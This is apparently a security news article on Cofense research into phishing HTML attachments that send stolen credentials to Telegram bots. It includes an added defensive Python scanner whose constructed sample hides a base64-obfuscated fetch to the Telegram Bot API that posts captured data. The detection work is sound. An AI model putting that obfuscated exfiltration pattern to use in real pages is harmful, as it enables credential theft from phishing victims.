The use of Telegram bots for credential exfiltration increased more than eight-fold between 2021 and 2022, according to new research.
A report released this week by Cofense finds that while the use of Telegram bots to exfiltrate information is not new, threat actors have not commonly used them for credential phishing in the past. Researchers noted that the significant increase is primarily associated with the currently popular tactic of using HTML attachments as delivery mechanisms and with how easy Telegram bots are to set up.
“During 2022, there has been a gradual increase of evasive campaigns using Telegram bots reaching inboxes. Most of the emails in these campaigns contain an attached HTML file. This HTML file generally has a Telegram bot’s authentication and location hardcoded and obfuscated, or redirects to a domain that hosts a phishing kit with the bot’s ID hardcoded into its resources,” the report read.
The rise of abuse of Telegram bots in 2022 (credit: Cofense)
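The following scanner is an added example for defenders, not code from the Cofense report or from SC Media: it looks for the pattern the report describes, a Telegram bot's token and chat ID hardcoded in an HTML attachment, including when they are hidden under one or more layers of base64. The token shape (numeric bot ID, a colon, 35 URL-safe characters), the regexes and the sample attachment are assumptions constructed for this example.

```python
import re
import base64

# Assumed shapes (not taken from the Cofense report): the Bot API path prefix,
# a token as "<numeric bot id>:<35 URL-safe chars>" and a chat_id parameter.
API_RE = re.compile(r"api\.telegram\.org/bot", re.IGNORECASE)
TOKEN_RE = re.compile(r"(?<!\d)\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")
CHAT_RE = re.compile(r"chat_id\s*[=:]\s*['\"]?(-?\d{5,})", re.IGNORECASE)
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")  # candidate base64 blobs

def _scan_text(text, layer):
    """Return a finding for one text layer, or None if nothing matched."""
    finding = {"layer": layer, "api_hit": bool(API_RE.search(text)),
               "tokens": TOKEN_RE.findall(text), "chat_ids": CHAT_RE.findall(text)}
    if finding["api_hit"] or finding["tokens"] or finding["chat_ids"]:
        return finding
    return None

def scan_html_attachment(html, max_depth=2):
    """Scan an HTML attachment for hardcoded Telegram bot credentials,
    looking through up to max_depth layers of base64 obfuscation."""
    findings, layers, depth = [], [("plain", html)], 0
    while layers and depth <= max_depth:
        next_layers = []
        for layer, text in layers:
            finding = _scan_text(text, layer)
            if finding:
                findings.append(finding)
            if depth == max_depth:
                continue  # deepest layer: report it, but do not decode further
            for blob in B64_RE.findall(text):
                try:
                    decoded = base64.b64decode(blob, validate=True).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    continue  # not base64, or decodes to binary: skip it
                next_layers.append((f"base64-depth-{depth + 1}", decoded))
        layers, depth = next_layers, depth + 1
    return findings

# Constructed sample: a script that posts to a made-up bot, hidden behind atob().
SAMPLE_SCRIPT = ('fetch("https://api.telegram.org/bot1234567890:'
                 'AAHfakeTOKENfakeTOKENfakeTOKENfake0/sendMessage'
                 '?chat_id=-100123456789&text=" + captured);')
SAMPLE_HTML = ('<html><body><script>eval(atob("'
               + base64.b64encode(SAMPLE_SCRIPT.encode()).decode()
               + '"))</script></body></html>')
```

Running `scan_html_attachment(SAMPLE_HTML)` reports nothing at the plain layer and one finding at `base64-depth-1` carrying the API hit, the token and the chat ID; a token reported this way can be revoked through Telegram's bot management and the chat ID blocked at the mail gateway.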
Telegram bots are like the classic service robots in science fiction movies, but virtual and active on Telegram, Joe Gallop, cyber threat intelligence manager at Cofense, explained to SC Media in an interview. Indeed, by the official definition on the Telegram website, these bots can support “any kind of task or service,” with some popular functions including delivering answers to users’ FAQs, converting certain file types into others, or setting reminders for users.
Unfortunately, “any kind of task or service” also attracts threat actors to perform malicious tasks and services.